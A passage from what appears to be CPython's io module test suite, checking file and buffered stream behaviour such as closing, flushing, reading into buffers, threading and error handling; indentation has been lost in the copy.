with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
